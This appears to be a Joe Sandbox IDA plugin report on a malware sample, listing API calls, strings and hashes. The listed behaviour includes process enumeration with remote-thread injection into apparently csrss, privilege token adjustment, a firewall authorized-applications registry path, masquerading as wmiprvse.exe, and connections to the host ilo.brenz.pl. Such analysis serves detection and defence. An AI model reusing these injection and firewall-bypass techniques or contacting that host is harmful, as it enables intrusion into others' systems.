Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: @$E$L8@$P$p8@$8@$[@
API String ID: 896407411-1894845992
Opcode ID: 6d76287d7377fc4d1ca150cdd5e1076a9e97807c64b402054d467cd7bc3b86a8
Instruction ID: d762af154df64fd3c6005db1ca3581d92c9b953f8629a195cdfd469d7596aa35
Opcode Fuzzy Hash: 6d76287d7377fc4d1ca150cdd5e1076a9e97807c64b402054d467cd7bc3b86a8
Instruction Fuzzy Hash: 30614C71548384AAD310DB64CC45B5FBBE9FF89308F40092DF688A72D1DAB49909CB9B

Function 004041CF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 159threadCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040424F
ExitThread.KERNEL32 ref: 004043BB

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

sprintf.MSVCRT ref: 00404317
sprintf.MSVCRT ref: 00404348

Strings

%s/%s, xrefs: 00404311
L8@, xrefs: 0040422E
#0%s!, xrefs: 00404342
:8@, xrefs: 00404205
(8@, xrefs: 00404358

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: sprintf$CountExitThreadTickmallocrand
String ID: #0%s!$%s/%s$(8@$:8@$L8@
API String ID: 3712263441-812610358
Opcode ID: 1fb8edccde2239dcf819b419ffd2f10b3402cd0bf8fe435dcda30660f774dccf
Instruction ID: 1928d251c466a658d3dfa1dbb8552598425e23835ae83e9358d9328c5b0794ed
Opcode Fuzzy Hash: 1fb8edccde2239dcf819b419ffd2f10b3402cd0bf8fe435dcda30660f774dccf
Instruction Fuzzy Hash: 1751A3B15043409FE310DB34C945B5BBAE4AFC4704F000A3EF69AA72D1E7B495058B5E

Function 0047D4BD Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0047E0C9: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 0047E0E9

CloseHandle.KERNEL32(?), ref: 0047D2C4
FreeLibrary.KERNEL32(A58583C3,?,0047D4AC,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D4C9
CloseHandle.KERNEL32(?,?,0047D4AC,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D4D0
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D4DA
Process32First.KERNEL32 ref: 0047D4ED
Process32Next.KERNEL32 ref: 0047D4FE
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D516
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 0047D553
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 0047D56E
CloseHandle.KERNEL32 ref: 0047D57D

Strings

csrs, xrefs: 0047D53D

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryNextOpenPrivilegesProcessRemoteSnapshotThreadTokenToolhelp32
String ID: csrs
API String ID: 931541398-2321902090
Opcode ID: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction ID: 3cfd69b60c374d0d3d65ca31b379ca15b6d48a512b285e6bab972a84e5075eef
Opcode Fuzzy Hash: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction Fuzzy Hash: 7A119330614215FBDB255E21CC49BFF3A7DDF44741F54842EF80A99181C7B4DF4186AA

Function 7FE307B5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE313C1: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE313D1
Part of subcall function 7FE313C1: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE313E1

CloseHandle.KERNEL32(?), ref: 7FE305BC
FreeLibrary.KERNEL32(76DA0000,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C1
CloseHandle.KERNEL32(?,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

csrs, xrefs: 7FE30835

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction ID: eba08b2346753bb0dc32dc5381f4741ba834f7a00a5bae23cd1368a28801996b
Opcode Fuzzy Hash: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction Fuzzy Hash: 6D119830A0A215FBEB255F21CC4DBBE3A7DDF44745F510028FA4799080DBB0DB41C6A6

Function 00401660 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004016A7
strcspn.MSVCRT ref: 004016C4
strncpy.MSVCRT ref: 004016D3
strcspn.MSVCRT ref: 004016E3
atoi.MSVCRT(00000000), ref: 0040175F

Strings

L8@, xrefs: 00401769
:8@, xrefs: 0040178B
(8@, xrefs: 0040179A

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: strcspn$atoistrncpystrstr
String ID: (8@$:8@$L8@
API String ID: 896909712-67691562
Opcode ID: 74f2855ef3a0f674b5d1c88f69f431229b06cb2c14ad1b607f774191325958ff
Instruction ID: 423295b4073bef868c52a0da5d7697345aa104327ed5b96778bd2d0c64799647
Opcode Fuzzy Hash: 74f2855ef3a0f674b5d1c88f69f431229b06cb2c14ad1b607f774191325958ff
Instruction Fuzzy Hash: CA213931A002186BC710A778DD06BEA7765AF48714F0006BEFA5AF32C1DEB85A408B9D

Function 7FE332B8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE332AC), ref: 7FE332B8

Part of subcall function 7FE332CF: GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
Part of subcall function 7FE332CF: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
Part of subcall function 7FE332CF: wsprintfA.USER32 ref: 7FE332FA
Part of subcall function 7FE332CF: CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
Part of subcall function 7FE332CF: CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
Part of subcall function 7FE332CF: WSAStartup.WS2_32(00000101), ref: 7FE333D1
Part of subcall function 7FE332CF: Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
hell32.dll,-1, xrefs: 7FE3330E

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: AddressCloseCreateFileHandleLibraryLoadModuleNameProcSleepStartupThreadwsprintf
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1694642180-1583563992
Opcode ID: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction ID: 12527aadef34871a68a9f0f3636c4070517339c0fc18d64a5fb64a9bfd057a23
Opcode Fuzzy Hash: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction Fuzzy Hash: F031E471918715BFD7229A208C4EFEA366CDF41711F804219F85A9E081DAF46F06D6A5

Function 009B32B8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(009B32AC), ref: 009B32B8

Part of subcall function 009B32CF: GetProcAddress.KERNEL32(00000000,009B32C3), ref: 009B32D0
Part of subcall function 009B32CF: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 009B32E5
Part of subcall function 009B32CF: wsprintfA.USER32 ref: 009B32FA
Part of subcall function 009B32CF: CreateThread.KERNEL32(00000000,00000000,009B2C7D,00000000,00000000), ref: 009B3343
Part of subcall function 009B32CF: CloseHandle.KERNEL32(?,0C1A4F68), ref: 009B334C
Part of subcall function 009B32CF: WSAStartup.WS2_32(00000101), ref: 009B33D1
Part of subcall function 009B32CF: Sleep.KERNEL32(00001388,00000000,00000000), ref: 009B33F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B330E

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: AddressCloseCreateFileHandleLibraryLoadModuleNameProcSleepStartupThreadwsprintf
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1694642180-1583563992
Opcode ID: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction ID: 3f2befe13118c3ce72ce2bf6b0b7bd5de0cd341f01bccea031db3987cbea8421
Opcode Fuzzy Hash: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction Fuzzy Hash: C831F471518615FFDB25AF24CD4EBEB36ACDF41320F40811AF8559E0C1DAF45F0A86A5

Function 7FE33565 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84sleepnetworkstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7
wsprintfA.USER32 ref: 7FE33566
Sleep.KERNEL32(00000064,?,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE36125,00000000,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,?,?,00000000), ref: 7FE33612
GetTickCount.KERNEL32 ref: 7FE3361B
closesocket.WS2_32 ref: 7FE3363F
Sleep.KERNEL32(00007530), ref: 7FE33653

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33565, 7FE33570, 7FE33590

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: Sleep$CountTickVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe
API String ID: 2598339483-2345302899
Opcode ID: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction ID: d85bbd76be20f0a00c0cc1f3b58fd3048d72df3a51a8d270456399880643c19b
Opcode Fuzzy Hash: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction Fuzzy Hash: AC219171A04355BFEB259F24880DFAE3A7EEF41616F900504E80A9E194CBF0AB01DBA5

Function 009B3565 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84sleepnetworkstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388,00000000,00000000), ref: 009B33F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 009B3412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 009B341D
socket.WS2_32(00000002,00000001,00000000), ref: 009B3453
connect.WS2_32(?,009B2EB6,00000010), ref: 009B346D
GetVersionExA.KERNEL32(?,?,009B2EB6,00000010), ref: 009B34B7
wsprintfA.USER32 ref: 009B3566
Sleep.KERNEL32(00000064,?,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,009B6125,00000000,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,?,?,00000000), ref: 009B3612
GetTickCount.KERNEL32 ref: 009B361B
closesocket.WS2_32 ref: 009B363F
Sleep.KERNEL32(00007530), ref: 009B3653

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B3565, 009B3570, 009B3590

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Sleep$CountTickVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe
API String ID: 2598339483-2345302899
Opcode ID: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction ID: d7ba4ce2a12f6a2f5258369a9ddec2ed887766dd1167a7ccc69867db07586697
Opcode Fuzzy Hash: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction Fuzzy Hash: 7921B671604219BBDF34DF288A1EBEE3B6DDF41721F504404F80A9A081DBF49F018A55

Function 0048009A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177sleeplibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0048008E), ref: 0048009A
Sleep.KERNEL32(00001388,00000000,00000000), ref: 004800FB
lstrlenA.KERNEL32(ilo.brenz.pl), ref: 00480125
GetVersionExA.KERNEL32(?,?,0047FBBE,00000010), ref: 004801BF

Strings

ilo.brenz.pl, xrefs: 00480119, 00480124

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

